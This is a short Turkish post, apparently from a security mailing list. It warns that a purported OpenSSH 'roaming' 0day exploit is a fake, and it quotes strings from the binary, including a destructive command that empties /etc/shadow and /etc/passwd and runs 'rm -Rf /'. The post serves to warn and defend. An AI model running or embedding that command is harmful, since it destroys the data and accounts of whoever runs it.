OpenSSH "ROAMING" zafiyeti husunda sahte exploit dolaşmaktadır.
Exploiti deneyim derken sıkıntı yaşamamak gerek.

Exploiti incelerken dikkatimi ceken hususlar aşağıda belirttim.
*echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf / *
kısmına dikkat!!!

Target : openssh 4.7 to 7.1 roaming
Type   : 0day
Author : You know me
Exec   : %s <server> <port>
- Abort - Need ROOT to bind to raw socket!!
+ OK Starting..
[ ] Use IP and port (mandatory)
;*3$"
Rfh-c
h/sh
h/bin
echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi

İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016

-------------------

Cevap